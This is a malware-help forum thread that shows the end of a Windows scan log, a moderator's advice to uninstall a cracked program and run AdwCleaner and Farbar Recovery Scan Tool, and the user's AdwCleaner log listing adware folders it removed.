[2014.08.09 19:36:00 | 000,000,982 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2014.08.09 19:34:00 | 000,001,932 | ---- | M] () -- C:\Windows\tasks\VisualBee-chromeinstaller.job

[2014.08.09 19:34:00 | 000,001,856 | ---- | M] () -- C:\Windows\tasks\VisualBee-firefoxinstaller.job

[2014.08.09 19:34:00 | 000,001,228 | ---- | M] () -- C:\Windows\tasks\VisualBee-codedownloader.job

[2014.08.09 19:34:00 | 000,001,222 | ---- | M] () -- C:\Windows\tasks\VisualBee-updater.job

[2014.08.09 19:34:00 | 000,001,128 | ---- | M] () -- C:\Windows\tasks\VisualBee-enabler.job

[2014.08.09 17:34:02 | 000,000,976 | ---- | M] () -- C:\Windows\tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007Core.job

[2014.08.09 15:30:40 | 000,001,013 | ---- | M] () -- C:\Users\Public\Desktop\TeamViewer 9.lnk

[2014.08.09 15:24:47 | 000,010,240 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2014.08.09 15:24:47 | 000,010,240 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2014.08.09 15:15:28 | 000,000,320 | ---- | M] () -- C:\Windows\tasks\Start Registry Reviver for FAMILIE-LE-NB@PhanCo(logon).job

[2014.08.09 15:15:09 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2014.08.09 15:14:56 | 2962,243,584 | -HS- | M] () -- C:\hiberfil.sys

[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files Created - No Company Name ==========

[2014.02.25 21:22:57 | 000,000,408 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\CamShapes.ini

[2014.02.25 21:22:57 | 000,000,408 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\CamLayout.ini

[2014.02.25 21:22:57 | 000,000,068 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\Camdata.ini

[2014.02.25 21:22:33 | 000,004,535 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\CamStudio.cfg

[2014.02.25 21:10:19 | 000,000,096 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\version2.xml

[2014.01.12 22:05:27 | 000,366,611 | ---- | C] () -- C:\Users\Papa\AppData\Local\mysearchdial-speeddial.crx

[2013.10.30 10:37:20 | 000,158,989 | ---- | C] () -- C:\Windows\SysWow64\vtcvnpt2.sys

[2013.10.30 10:37:20 | 000,028,558 | ---- | C] () -- C:\Windows\SysWow64\vtcvnpt3.sys

[2013.10.30 10:37:20 | 000,027,480 | ---- | C] () -- C:\Windows\SysWow64\vtcvnpt1.sys

[2013.10.30 10:37:18 | 000,000,007 | ---- | C] () -- C:\Windows\SysWow64\convnpt1.ini

[2013.09.28 22:59:00 | 000,103,736 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe

[2013.09.28 22:58:43 | 000,669,184 | ---- | C] () -- C:\Windows\SysWow64\pbsvc.exe

[2013.09.23 21:20:37 | 000,000,293 | ---- | C] () -- C:\Windows\game.ini

[2013.09.01 21:49:49 | 000,000,291 | ---- | C] () -- C:\Windows\cod2demo.ini

[2013.05.03 19:12:09 | 000,000,092 | ---- | C] () -- C:\Users\Papa\AppData\Local\fusioncache.dat

[2013.05.01 21:10:02 | 001,668,074 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI

[2012.10.05 17:27:16 | 000,704,000 | ---- | C] () -- C:\Windows\SysWow64\ContentDirectoryPresenter.dll

[2012.08.21 11:26:16 | 000,046,592 | ---- | C] () -- C:\Windows\SysWow64\boost_thread-vc90-mt-1_47.dll

[2012.08.21 11:26:04 | 000,038,912 | ---- | C] () -- C:\Windows\SysWow64\boost_date_time-vc90-mt-1_47.dll

[2012.08.21 11:25:52 | 000,704,000 | ---- | C] () -- C:\Windows\SysWow64\boost_regex-vc90-mt-1_47.dll

[2012.08.21 11:25:52 | 000,227,840 | ---- | C] () -- C:\Windows\SysWow64\boost_serialization-vc90-mt-1_47.dll

[2012.08.21 11:25:50 | 000,012,800 | ---- | C] () -- C:\Windows\SysWow64\boost_system-vc90-mt-1_47.dll

[2012.08.21 11:25:48 | 000,130,048 | ---- | C] () -- C:\Windows\SysWow64\boost_filesystem-vc90-mt-1_47.dll

[2012.08.14 11:42:22 | 000,025,600 | ---- | C] () -- C:\Windows\SysWow64\MediaDB.dll

[2012.02.22 23:24:19 | 000,000,057 | ---- | C] () -- C:\ProgramData\Ament.ini

[2012.01.17 22:41:43 | 000,000,680 | RHS- | C] () -- C:\Users\Papa\ntuser.pol

[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\ProgramData\SingleFiles

[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\ProgramData\Services

[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\ProgramData\Scripts Menu

[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\Users\Papa\AppData\Roaming\Screen Saver

[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\Users\Papa\AppData\Roaming\Sci-Fi

[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\Users\Papa\AppData\Roaming\Sampler Instruments

[2011.08.05 17:58:08 | 000,000,020 | -H-- | C] () -- C:\ProgramData\PKP_DLev.DAT

[2011.08.05 17:58:08 | 000,000,020 | -H-- | C] () -- C:\ProgramData\PKP_DLet.DAT

[2011.08.05 17:58:08 | 000,000,020 | -H-- | C] () -- C:\ProgramData\PKP_DLes.DAT

[2011.08.05 17:58:08 | 000,000,012 | RH-- | C] () -- C:\ProgramData\StatusSheet

[2011.08.05 17:58:08 | 000,000,012 | RH-- | C] () -- C:\ProgramData\StartupItems

[2011.08.05 17:58:08 | 000,000,012 | RH-- | C] () -- C:\ProgramData\Standard

[2011.03.05 22:13:29 | 000,012,292 | -H-- | C] () -- C:\Users\Papa\.DS_Store

[2011.01.02 19:03:16 | 000,007,597 | ---- | C] () -- C:\Users\Papa\AppData\Local\Resmon.ResmonCfg

[2010.07.02 18:41:30 | 000,131,984 | ---- | C] () -- C:\ProgramData\FullRemove.exe

[2009.04.09 19:44:42 | 000,108,066 | R--- | C] () -- C:\ProgramData\DeviceManager.xml.rc4

========== ZeroAccess Check ==========

[2009.07.14 11:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

"" = C:\Windows\SysNative\shell32.dll -- [2012.06.09 12:30:56 | 014,165,504 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2012.06.09 11:46:56 | 012,868,608 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64

"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009.07.14 08:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.07.14 08:15:20 | 000,605,696 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64

"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009.07.14 08:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2014.01.12 22:15:30 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\.minecraft

[2014.03.12 20:37:33 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Aeria Games & Entertainment

[2014.06.25 20:36:31 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\AppRevels.com

[2009.01.05 06:02:16 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\AVAST Software

[2013.04.26 21:50:09 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\BabSolution

[2013.04.26 21:48:48 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Babylon

[2014.03.24 22:06:58 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Bechiro S.L

[2013.11.08 01:13:29 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Bundysoft

[2014.06.27 13:18:54 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\com.erclab.air.phototransferapp

[2010.11.28 12:59:18 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Command & Conquer 3 Kane's Wrath

[2010.12.02 16:01:19 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Command and Conquer 4

[2013.01.31 20:44:21 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\CSMPlay

[2013.05.01 23:28:24 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DAEMON Tools Lite

[2011.05.13 23:29:32 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DAEMON Tools Pro

[2013.09.01 17:54:46 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DefaultTab

[2013.04.26 21:49:41 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Delta

[2014.06.27 13:39:15 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DMCache

[2012.02.18 00:05:11 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DVDVideoSoft

[2012.02.18 00:05:05 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DVDVideoSoftIEHelpers

[2013.04.26 21:48:37 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\ExpressFiles

[2014.02.22 23:45:50 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Garena

[2014.02.23 11:24:24 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\GarenaPlus

[2013.05.07 19:11:06 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\GoforFiles

[2011.10.30 21:11:51 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Haufe Mediengruppe

[2011.03.19 15:17:46 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\ICAClient

[2014.06.25 11:03:38 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\IDM

[2014.08.09 21:45:15 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\install

[2010.11.16 02:30:03 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Leadertech

[2013.08.05 14:51:01 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\LEGO Company

[2011.10.24 21:53:56 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Lexware

[2014.02.22 23:46:17 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\LolClient

[2014.06.07 23:48:40 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\MCommon

[2013.11.01 19:34:59 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Mount&Blade

[2013.10.29 18:55:43 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Mount&Blade Warband

[2014.01.12 22:05:30 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\mysearchdial

[2013.06.07 13:20:45 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\NCdownloader

[2011.11.25 22:12:48 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Nikon

[2013.11.23 13:28:30 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\OpenCandy

[2012.11.11 10:59:38 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\PowerCinema

[2014.04.02 16:27:59 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\rmi

[2013.11.07 21:21:53 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Smart PC Cleaner

[2013.11.04 19:00:59 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Sony

[2013.12.19 18:09:58 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\SYSTEMAX Software Development

[2014.06.25 11:01:50 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\TeamViewer

[2012.06.15 21:18:32 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Telefónica

[2014.06.09 23:05:42 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Telerik

[2011.10.13 21:42:53 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Tencent

[2014.06.25 20:39:38 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\tiger-k

[2013.01.20 16:18:07 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Ubisoft

[2013.09.02 14:05:02 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\uTorrent

[2011.10.13 21:42:53 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\VinaGame

[2010.11.14 19:30:42 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Vodafone

[2014.06.25 10:33:01 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\webnavi

[2013.09.13 19:33:18 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\WinLive

[2014.03.30 17:58:33 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Yontoo

========== Purity Check ==========

========== Files - Unicode (All) ==========

(C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Quy?n Vương Online) -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Quyền Vương Online

========== Alternate Data Streams ==========

@Alternate Data Stream - 149 bytes -> C:\ProgramData\Temp:CDFF58FE

@Alternate Data Stream - 144 bytes -> C:\ProgramData\Temp:5D7E5A8F

@Alternate Data Stream - 141 bytes -> C:\ProgramData\Temp:E36F5B57

@Alternate Data Stream - 135 bytes -> C:\ProgramData\Temp:E1F04E8D

@Alternate Data Stream - 134 bytes -> C:\ProgramData\Temp:1A60DE96

@Alternate Data Stream - 119 bytes -> C:\ProgramData\Temp:4D066AD2

< End of report >

#2
Essexboy

Posted 11 August 2014 - 07:25 AM

GeekU Moderator

Retired Staff
69,964 posts

Hi there, using cracks is bad juju as they generally come with additional unwanted extras. Uninstall the crack please and then do the following

Please download AdwCleaner by Xplode onto your desktop.

Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Scan.
After the scan is complete click on "Clean"
Confirm each time with Ok.
Your computer will be rebooted automatically. A text file will open after the restart.
Please post the content of that logfile with your next answer.
You can find the logfile at C:\AdwCleaner[S1].txt as well.

THEN

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
Select additions at the bottom
Press Scan button.
It will produce a log called FRST.txt in the same directory the tool is run from.
Please attach both logs generated.

#3
langvu900

Posted 12 August 2014 - 06:30 AM

Member

Topic Starter
Member
11 posts

Hello, i did it but i got a file name AdwCleaner[0].txt hope it's the right one. Here it is:

# AdwCleaner v3.304 - Bericht erstellt am 12/08/2014 um 17:57:07

# Aktualisiert 08/08/2014 von Xplode

# Betriebssystem : Windows 7 Home Premium (64 bits)

# Benutzername : Papa - FAMILIE-LE-NB

# Gestartet von : C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner.exe

# Option : Löschen

***** [ Dienste ] *****

[x] Nicht Gelöscht : DefaultTabUpdate

***** [ Dateien / Ordner ] *****

Ordner Gelöscht : C:\ProgramData\Babylon

Ordner Gelöscht : C:\ProgramData\BetterSoft

Ordner Gelöscht : C:\ProgramData\BitGuard

Ordner Gelöscht : C:\ProgramData\BonanzaDealsLive

Ordner Gelöscht : C:\ProgramData\FileCure

Ordner Gelöscht : C:\ProgramData\Partner

Ordner Gelöscht : C:\ProgramData\StarApp

Ordner Gelöscht : C:\ProgramData\Tarma Installer

Ordner Gelöscht : C:\ProgramData\Tencent

Ordner Gelöscht : C:\ProgramData\VisualBee

Ordner Gelöscht : C:\ProgramData\contaiynuettosaovve

Ordner Gelöscht : C:\ProgramData\greaTsavear

Ordner Gelöscht : C:\ProgramData\savenshAriE

Ordner Gelöscht : C:\ProgramData\Soearachh-NewTiaabi

Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Optimizer Pro

Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SkypEmoticons

Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\smart pc cleaner

Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Soearachh-NewTiaabi

Ordner Gelöscht : C:\Program Files (x86)\BonanzaDeals

Ordner Gelöscht : C:\Program Files (x86)\BonanzaDealsLive

Ordner Gelöscht : C:\Program Files (x86)\Conduit

Ordner Gelöscht : C:\Program Files (x86)\continuetosave

Ordner Gelöscht : C:\Program Files (x86)\DefaultTab

Ordner Gelöscht : C:\Program Files (x86)\Delta

Ordner Gelöscht : C:\Program Files (x86)\driver-soft

Ordner Gelöscht : C:\Program Files (x86)\FilesFrog Update Checker

Ordner Gelöscht : C:\Program Files (x86)\GreenTree Applications

Ordner Gelöscht : C:\Program Files (x86)\Minibar

Ordner Gelöscht : C:\Program Files (x86)\MyPC Backup

Ordner Gelöscht : C:\Program Files (x86)\Mysearchdial

Ordner Gelöscht : C:\Program Files (x86)\Optimizer Pro

Ordner Gelöscht : C:\Program Files (x86)\Red Sky

Ordner Gelöscht : C:\Program Files (x86)\SafeSaver

Ordner Gelöscht : C:\Program Files (x86)\smart pc cleaner

Ordner Gelöscht : C:\Program Files (x86)\ss helper

Ordner Gelöscht : C:\Program Files (x86)\Vittalia

Ordner Gelöscht : C:\Program Files (x86)\WebSearch

Ordner Gelöscht : C:\Program Files (x86)\WebSparkle

Ordner Gelöscht : C:\Program Files (x86)\Yontoo

Ordner Gelöscht : C:\Program Files (x86)\greaTsavear

Ordner Gelöscht : C:\Program Files (x86)\Common Files\DVDVideoSoft\TB

Ordner Gelöscht : C:\Users\Administrator\AppData\Local\torch

Ordner Gelöscht : C:\Users\ASPNET\AppData\Local\torch

Ordner Gelöscht : C:\Users\Gast\AppData\Local\torch

Ordner Gelöscht : C:\Users\HomeGroupUser$\AppData\Local\torch

Ordner Gelöscht : C:\Users\Kenh\AppData\Local\torch

Ordner Gelöscht : C:\Users\Kenh\AppData\LocalLow\contaiynuettosaovve

Ordner Gelöscht : C:\Users\Kenh\AppData\LocalLow\Soearachh-NewTiaabi

Ordner Gelöscht : C:\Users\Kenh\AppData\Roaming\NCdownloader

Ordner Gelöscht : C:\Users\Mama\AppData\Local\torch

Ordner Gelöscht : C:\Users\Papa\AppData\Local\BonanzaDealsLive

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Conduit

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Minibar

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Mobogenie

Ordner Gelöscht : C:\Users\Papa\AppData\Local\torch

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Temp\mt_ffx

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Temp\Tencent

Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\Conduit

Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\Minibar

Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\PriceGong

Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\contaiynuettosaovve

Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\Soearachh-NewTiaabi

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\BabSolution

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Babylon

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\DefaultTab

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Delta

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\dvdvideosoftiehelpers

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\ExpressFiles

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\goforfiles

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mysearchdial

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\NCdownloader

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\OpenCandy

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\SkypEmoticons

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\smart pc cleaner

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Tencent

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\WebNavi

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Yontoo

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BitGuard

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FilesFrog Update Checker

Ordner Gelöscht : C:\Users\Papa\Documents\Mobogenie

Ordner Gelöscht : C:\Users\Papa\Documents\smart pc cleaner

Ordner Gelöscht : C:\Users\PhanCo\AppData\LocalLow\Conduit

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\DownTango

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\torch

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\LocalLow\contaiynuettosaovve

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\LocalLow\Soearachh-NewTiaabi

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\ExpressFiles

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\hotspot shield

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\{97A78363-B868-4B48-AC91-A783A31215AF}

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\{ACAA314B-EEBA-48E4-AD47-84E31C44796C}

Ordner Gelöscht : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\Extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}

Ordner Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\Extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\Extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected]

Ordner Gelöscht : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\Extensions\[email protected]

Ordner Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\Extensions\[email protected]

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected]

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\Extensions\[email protected]

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected]

Ordner Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\Extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com

Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\Extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp

Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc

Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\niapdbllcanepiiimjjndipklodoedlc

Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\niapdbllcanepiiimjjndipklodoedlc

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj

Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff

Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kmkdohofefokfmbnlbgebdapndacfklg

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected]

Datei Gelöscht : C:\Users\Papa\daemonprocess.txt

Datei Gelöscht : C:\Users\Papa\AppData\Local\mysearchdial-speeddial.crx

Datei Gelöscht : C:\Users\Papa\AppData\Local\Temp\Uninstall.exe

Datei Gelöscht : C:\Users\Papa\Desktop\Check for Updates.lnk

Datei Gelöscht : C:\Users\Papa\Desktop\Smart PC Cleaner.lnk

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\daemonprocess.txt

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\bProtector_extensions.rdf

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\bprotector_extensions.sqlite

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\bprotector_extensions.sqlite

Datei Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\bprotector_prefs.js

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\bprotector_prefs.js

Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\bprotector_prefs.js

Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\Babylon.xml

